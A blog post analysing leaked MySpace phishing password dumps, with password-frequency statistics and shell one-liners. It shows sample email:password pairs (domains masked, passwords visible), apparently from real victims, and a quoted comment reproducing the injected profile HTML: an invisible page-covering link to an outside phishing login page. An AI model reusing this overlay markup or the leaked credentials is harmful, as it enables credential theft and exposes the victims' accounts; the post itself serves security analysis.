Contents
Abstract
Today I found a interesting article on Myspace phishing site discloses countless usernames and passwords on SecuriTeam. Some one must have found the user/password combo file collected by a Phisher. It is a collection of ~57’000 User/pass (actually email/pass) combos. Some of them will be fake but anyway, I’ve got interested in the whole story. After some research I found the original advisory on FullDisclosure (which by the way also includes the passdump). I also Googled a bit around and found 3 more files with the name “myspace.txt”. This short analysis is based on these 4 passdumps. I really like to play with real data 🙂
The files
File | Size | Lines | Unique lines | Comment |
m0 | 1886347 | 56590 | 42575 | Original file from the advisory |
m1 | 1405905 | 45325 | 43098 | found with google |
m2 | 1527730 | 48892 | 46664 | found with google |
m3 | 1527769 | 48900 | 46664 | found with google |
People and fishing
Some people realized that they are going to be phished 🙂
fuck.off.seriousy:computergek you really really suck:fuckoffthisissomethingadickwoulddo youguyssuck@fuckoff.com:getalifeubastard fuckyou@fuckoff.com:diephisher lollol
Other peoples don’t. They actually try to login many times (the number before the combo is the number of logins they tried):
[system@nord myspace]# sort * | uniq -c | sort -n | tail -n 30 18 amandamyspace_email@xxxx.com:josh2202 18 blndygrl82@xxxxxx.com:luvyachris 18 dncrj629@xxxxxxxx.net:julie 18 dtonesuperstarr@xxxxxxxx.com:carla09 18 eathenallen@xxx.com:candisma3 18 haleytrash@xxxxxx.com:buttcrack. 18 iamtyler44@xxxxxx.com:tjh123 18 katyandjan@xxxxxxx.net:meeow1 18 latinagirlveronica@xxxxx.com:teddy123 18 molly_doglover@xx.com:1007404mkk 20 alicewang93@xxxxxxxxxx.com:puppies11 21 b_radschenk@xxxxx.com:ford08 21 gogirl55546@xxxxxx.com:emmakauf! 21 helenichero617@xxx.com:christian 21 larissapasifull@xxxxxxx.com:16188s 21 soccergirlbay94@xxxxxxxx.com:1020064evaandalways 21 yellowducks4you@xxx.net:norton13 22 zjs1daddy@xxxxx.com:freeshit4me 23 jbacaphoto@xxxxxxxxx.net:tiger2 23 twisted_and_frayed@xxxxxx.com:danny12031986 24 cathysurmick@xxxx.com:travis13 24 rlsorey@xx.com:abc123 24 the_beast525@xxxx.com:zander1 24 typ.1985@xxxxxxx.com:Mikhail 27 amandapandapixie@xx.com:panda1 36 aaron.braesicke@xxxxxx.net:dragon1 40 prissykatie2@xxxxx.com:swimmer1 45 southpark1@xxxxxxx.com:ajizzle! 262 437Â : [system@nord myspace]#
Password quality
The 30 most used passwords
from the original list m0:
1 | [system@nord myspace]# sort m0 | uniq | awk -F: '{ print $2}' | sort | uniq -c | sort -n | tail -n 30 |
13 love123 13 michael1 13 password2 14 asshole 14 bitch 14 fuck you 14 iloveyou 14 jordan1 14 qwerty1 15 123456a 15 babygirl1 15 blink182 15 bubbles1 15 princess1 16 123abc 16 iloveyou2 17 123456 17 nicole1 18 football1 18 number1 21 password 22 i 24 fuckyou1 24 myspace1 28 iloveyou1 29 monkey1 34 fuckyou 56 abc123 75 password1 981
[system@nord myspace]#
Password length
BUT: if we lock at the 20 character passwords you will see, that these aren’t actually passwords:
duanne1105duanne1105 youreastupidjerkface ieatshitforbreakfest 1andrewlennon@yahcgg fishyp@sbcglobal.net suck my dick, pricks fuckinhackersgo2hell nice try you asshole ILLHACKYOURMOMSPUSSY suckmycockits9inches worthlesspieceofshit m loged in you bitch URADUMBFUKKHAKKERHAH Coopsieee3Coopsieee3 u suck i aint stupid heymrhackerurafaggot fuck you hack wanker jfduoa932p[1rguinfkl kaykay1211loserific1 stfu and get a life. this is fake dipshit fuck you and yo mama mind ya own business youmustthinkimstupid
How the Phisher did it
- from Waldo
Hmm… Oh no is very easy, yes very easy what he is doing. He left some traces on some of the “cracked” accounts, I was expectig of somebody to comment earlier since I’ve been a couple of hours since the initial post.
When you modify a profile you can add this to the data of the profile, you know those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account 😛
1 | HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="<a title="http://marcolano.com/login/" href="http://marcolano.com/login/" rel="nofollow">http://marcolano.com/login/</a>"> <img style="border-width:0px;width:2024px; height:1768px;" src="<img src="http://x.myspace.com/images/clear.gif" alt="clear.gif" />"> </a><a style="text-decoration:none;position: absolute;top:1px;left:1px;" href="<a title="http://marcolano.com/login/" href="http://marcolano.com/login/" rel="nofollow">http://marcolano.com/login/</a>"> <img style="border-width:0px;width:2024px; height:1768px;" src="<img src="http://x.myspace.com/images/clear.gif" alt="clear.gif" />"> </a><embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="<a title="http://www.../mov/cid_3277_f.mov" href="http://www.../mov/cid_3277_f.mov" rel="nofollow">http://www.../mov/cid_3277_f.mov</a>" width="1" height="1"> |
As you might see, this creates a huge invisible link in the page in front of everything, so when you click into anything on the page like a link or anything it will take you to that phising website so ppl beleive that the account expired and enter their user+pass. Now I beleive that his message was a way to tell about a BUG in myspace that should filter that content and it is not doing it. So… we are in fact not talking about a stupid phishing website for those who still beleive that.
Regards Waldo
- and KF enhance:
nameHREFTrack